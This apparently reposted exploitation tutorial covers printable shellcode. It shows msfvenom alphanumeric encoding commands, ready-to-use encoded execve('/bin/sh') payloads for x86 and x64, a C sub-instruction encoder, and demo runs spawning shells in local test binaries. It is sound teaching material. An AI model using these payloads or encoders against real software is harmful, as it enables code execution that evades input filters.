Generating printable shellcode

Sometimes the target program applies a printability check to our payload, for example by requiring the input to decode as UTF-8 or by rejecting any non-printable byte. Ordinary shellcode is full of such bytes and cannot pass, so the shellcode has to be encoded into a form that uses only printable characters.

After going through the material available online, two approaches worked well in practice.

x86 encoding

For x86 the encoders bundled with Metasploit are sufficient. Listing them:

ex@ex:~$ msfvenom -l encoders

Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

Note that at the time of writing (2019-07-13) Metasploit has no x64 counterpart of alpha_upper: the alphanumeric encoders are x86-only.

The first option is to encode one of Metasploit's own payloads. The command is:

msfvenom -a x86 --platform linux -p linux/x86/exec CMD="/bin/sh" -e x86/alpha_upper BufferRegister=EAX

BufferRegister names the register that holds the address of the shellcode at the moment it starts executing; the alpha2 decoder uses that register to find the encoded bytes it has to decode in place.

If BufferRegister is not given, the generated shellcode is prefixed with a few extra instructions (a GetPC sequence) that locate the shellcode at run time, and those bytes are not printable, which defeats the purpose of the alphanumeric encoding.

The result without BufferRegister looks like this; the first ten bytes (\x89\xe7\xda\xd1\xd9\x77\xf4\x5b\x53\x59) are the non-printable GetPC stub, everything after it is uppercase letters and digits:

ex@ex:~/test$ msfvenom -a x86 --platform linux -p linux/x86/exec CMD="/bin/sh" -e x86/alpha_upper -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 155 (iteration=0)
x86/alpha_upper chosen with final size 155
Payload size: 155 bytes
Final size of python file: 750 bytes
buf =  ""
buf += "\x89\xe7\xda\xd1\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += "\x4a\x49\x32\x4a\x44\x4b\x36\x38\x4a\x39\x56\x32\x33"
buf += "\x56\x45\x38\x56\x4d\x53\x53\x4d\x59\x4d\x37\x35\x38"
buf += "\x56\x4f\x32\x53\x52\x48\x53\x30\x55\x38\x46\x4f\x53"
buf += "\x52\x35\x39\x32\x4e\x4b\x39\x4d\x33\x36\x32\x5a\x48"
buf += "\x44\x48\x53\x30\x53\x30\x35\x50\x36\x4f\x42\x42\x42"
buf += "\x49\x52\x4e\x46\x4f\x54\x33\x35\x38\x43\x30\x31\x47"
buf += "\x36\x33\x4b\x39\x4b\x51\x58\x4d\x4d\x50\x41\x41"

The second option is to let msfvenom encode shellcode you wrote yourself, by piping the raw bytes in on stdin (the command is the first line of the run below). With BufferRegister=EAX the output is pure uppercase letters and digits, 103 bytes for this payload:

ex@ex:~/test$ cat shellcode | msfvenom -a x86 --platform linux -e x86/alpha_upper BufferRegister=EAX
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 103 (iteration=0)
x86/alpha_upper chosen with final size 103
Payload size: 103 bytes
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJ4K68J90RCXVO6O43E82HVOE2SYBNMYKS01XIHMMPAA

x64 encoding

Since Metasploit has no alphanumeric x64 encoder, a standalone Python 2 encoder is used instead (run from its own directory, shellcode_encoder, in the transcript). It takes the raw shellcode file, the register that points to the shellcode, and a third numeric argument; for the run below that is `python2 main.py shellcode rax 29`, and the tool's own log reports the resulting preamble as `rdx <- rax 29`. The input is the usual 27-byte execve("/bin/sh") shellcode, shown first with hexdump. The encoder works in stages: the instructions of its stage-2 decoder are each expanded into a printable sequence, the original shellcode is split into 8-byte chunks that are each expressed as a pair of printable 8-byte operands ("multiply-encoding stage3"), and a printable preamble is prepended that derives rdx from rax.

ex@ex:~/test/shellcode_encoder$ hexdump -C shellcode
00000000  48 b8 2f 62 69 6e 2f 73  68 00 50 48 89 e7 48 31  |H./bin/sh.PH..H1|
00000010  f6 48 f7 e6 b8 3b 00 00  00 0f 05                 |.H...;.....|
0000001b
ex@ex:~/test/shellcode_encoder$ python2 main.py shellcode rax 29
encoding stage2
488b0432 => 4863343a31343a53582d402874332d5020605f35383c2f5f505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
480faf44 => 4863343a31343a53582d713b40412d704520413557703039505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
32084889 => 4863343a31343a53582d244874202d5f606c20354f5f5736505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
043a83c7 => 4863343a31343a53582d402233402d41602020357b472f58505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
0883c610 => 4863343a31343a53582d402646612d502220413578345f4d505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
85c075e8 => 4863343a31343a53582d202022202d20407e4035455f2a77505e31343a57582d7e5b775f2d3f61682c2d3f432074505f
multiply-encoding stage3
48b82f62696e2f73 => 413553575a25252e 483e23646d6e2b73
6800504889e74831 => 415462524c61643a 684654484b634c35
f648f7e6b83b0000 => 4163795c343a7931 7649363a204f3a3b
000f059090909090 => 3c3b77625b273220 40707d593b5c7463
assembling jump at 408
encoding preamble for rdx <- rax 29
pptayaxvi31vxxxf-cof-@hf-@hpz
original length: 27
encoded length: 476
preamble length: 29
total length: 505
pptayaxvi31vxxxf-cof-@hf-@hpztayaxvi31vxpp[_hc4:14:sx-@(t3-p `_58~?p_hc4:14:sx-"* -e6 5f}//p^14:wx-~[w_-?ah,-?c tp_sx- a""- ?~~5\~__p^sx-@@@"-y``~5____p_aaaaa5swz%%.h>#dmn satbrlad:hfthkcl5acy\4:y1vi6: o:;<;wb['2 @p}y;\tc
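The encoded x64 output above is built largely from immediate arithmetic: the bytes '-' (0x2d) and '5' (0x35) that recur in it are the opcodes of `sub eax, imm32` and `xor eax, imm32`, and 'P' (0x50) is `push rax`. The following added example (my own code, not the encoder's or the article's) shows the core of that idea in its simplest form, the classic x86 sub-encoder: zero eax with two printable AND masks, subtract three printable immediates chosen byte by byte so that the result is any wanted dword, and push it. It does not reproduce the tool's mov/imul/xor stages; the printable byte range (0x21..0x7e), the mask constants and the "/bin//sh" sample target are my choices.

```c
/* Added example: printable x86 "sub-encoding" of a 32-bit value.
 * Not the shellcode_encoder tool's algorithm; a minimal illustration of the
 * sub-immediate technique its output is visibly built from. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Printable bytes allowed in the stub: 0x21..0x7e. Space (0x20) is excluded
 * because many input filters strip or split on it (my choice). */
static int is_printable_byte(unsigned c) { return c >= 0x21 && c <= 0x7e; }

int all_printable(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!is_printable_byte(p[i])) return 0;
    return 1;
}

/* Two printable masks with A & B == 0, so `and eax,A ; and eax,B` zeroes eax. */
#define ZERO_MASK_A 0x554e4d4aU   /* bytes "JMNU" in memory */
#define ZERO_MASK_B 0x2a313235U   /* bytes "521*" in memory */

/* Find three printable 32-bit immediates with
 *     imm[0] + imm[1] + imm[2] == -target   (mod 2^32)
 * so that 0 - imm[0] - imm[1] - imm[2] == target. Solved one byte at a time,
 * least significant first, carrying the addition overflow into the next byte.
 * Three operands always suffice: three bytes in 0x21..0x7e span more than 256
 * consecutive sums, so every residue mod 256 is reachable. Returns 1 on success. */
int sub_encode_dword(uint32_t target, uint32_t imm[3])
{
    uint32_t want = 0u - target;
    unsigned carry = 0;
    imm[0] = imm[1] = imm[2] = 0;
    for (unsigned k = 0; k < 4; k++) {
        long t = (want >> (8 * k)) & 0xff;
        int found = 0;
        for (unsigned b1 = 0x21; b1 <= 0x7e && !found; b1++)
            for (unsigned b2 = 0x21; b2 <= 0x7e && !found; b2++)
                for (long wrap = 0; wrap < 3 && !found; wrap++) {
                    /* need b1 + b2 + b3 + carry_in == t + 256*wrap */
                    long b3 = t + 256 * wrap - (long)b1 - (long)b2 - (long)carry;
                    if (b3 >= 0x21 && b3 <= 0x7e) {
                        imm[0] |= b1 << (8 * k);
                        imm[1] |= b2 << (8 * k);
                        imm[2] |= (uint32_t)b3 << (8 * k);
                        carry = (unsigned)wrap;   /* == (b1+b2+b3+carry_in) >> 8 */
                        found = 1;
                    }
                }
        if (!found) return 0;
    }
    return 1;
}

static void put_le32(unsigned char *p, uint32_t v)
{ p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24; }

/* Emit a 26-byte stub made only of printable bytes:
 *   25 <A>   and eax, A        25 <B>   and eax, B
 *   2d <i0>  sub eax, imm0     2d <i1>  sub eax, imm1     2d <i2>  sub eax, imm2
 *   50       push eax
 * Returns the stub length (26), or 0 if encoding failed. */
size_t emit_push_dword(uint32_t target, unsigned char out[26])
{
    uint32_t imm[3];
    if (!sub_encode_dword(target, imm)) return 0;
    size_t n = 0;
    out[n++] = 0x25; put_le32(out + n, ZERO_MASK_A); n += 4;
    out[n++] = 0x25; put_le32(out + n, ZERO_MASK_B); n += 4;
    for (int i = 0; i < 3; i++) { out[n++] = 0x2d; put_le32(out + n, imm[i]); n += 4; }
    out[n++] = 0x50;
    return n;
}

/* Model CPU: apply the stub's and/sub instructions to an eax holding garbage
 * and return the value `push eax` would place on the stack. */
uint32_t simulate_stub(const unsigned char *stub, size_t n)
{
    uint32_t eax = 0xdeadbeef;
    for (size_t i = 0; i + 5 <= n; i += 5) {
        uint32_t imm = (uint32_t)stub[i + 1] | (uint32_t)stub[i + 2] << 8
                     | (uint32_t)stub[i + 3] << 16 | (uint32_t)stub[i + 4] << 24;
        if (stub[i] == 0x25) eax &= imm;        /* and eax, imm32 */
        else if (stub[i] == 0x2d) eax -= imm;   /* sub eax, imm32 */
    }
    return eax;
}

/* Encode target, check the stub is all printable and rebuilds target exactly. */
int roundtrip_ok(uint32_t target)
{
    unsigned char stub[26];
    size_t n = emit_push_dword(target, stub);
    return n == 26 && all_printable(stub, n) && simulate_stub(stub, n) == target;
}

int main(void)
{
    /* Rebuild "/bin//sh" on the stack: push "//sh" first, then "/bin". */
    const uint32_t words[2] = { 0x68732f2f /* "//sh" */, 0x6e69622f /* "/bin" */ };
    for (int i = 0; i < 2; i++) {
        unsigned char stub[26];
        size_t n = emit_push_dword(words[i], stub);
        printf("0x%08x -> ", words[i]);
        fwrite(stub, 1, n, stdout);
        printf("  (%s)\n", roundtrip_ok(words[i]) ? "ok" : "FAIL");
    }
    return 0;
}
```

Each pushed dword costs 26 printable bytes here, which is why real encoders such as the one above add tricks (multiplication, a compact decoder loop) to shrink the output; the byte-wise carry search is the part they all share.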

The two test programs below reject raw shellcode outright because of their printable-input check, so the encoded shellcode produced above is supplied instead. Both runs end in a shell:

ex@ex:~/test$ file printable32
printable32: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=6bbd4307de7e93dcda81bef0f16617415b14ec17, not stripped
ex@ex:~/test$ ./printable32
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJ4K68J90RCXVO6O43E82HVOE2SYBNMYKS01XIHMMPAA
$ id
uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker)
$ exit
ex@ex:~/test$ file printable64
printable64: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=9d51fb0464f69bae2eb982d538eaee094d5b501b, not stripped
ex@ex:~/test$ ./printable64
pptayaxvi31vxxxf-cof-@hf-@hpztayaxvi31vxpp[_hc4:14:sx-@(t3-p `_58~?p_hc4:14:sx-"* -e6 5f}//p^14:wx-~[w_-?ah,-?c tp_sx- a""- ?~~5\~__p^sx-@@@"-y``~5____p_aaaaa5swz%%.h>#dmn satbrlad:hfthkcl5acy\4:y1vi6: o:;<;wb['2 @p}y;\tc
$ id
uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker)
$

Original article: https://xz.aliyun.com/t/5662

Reposted from the web; posted by 15h. If you republish, please credit the source: https://www.15cov.cn/2023/08/27/生成可打印的shellcode/
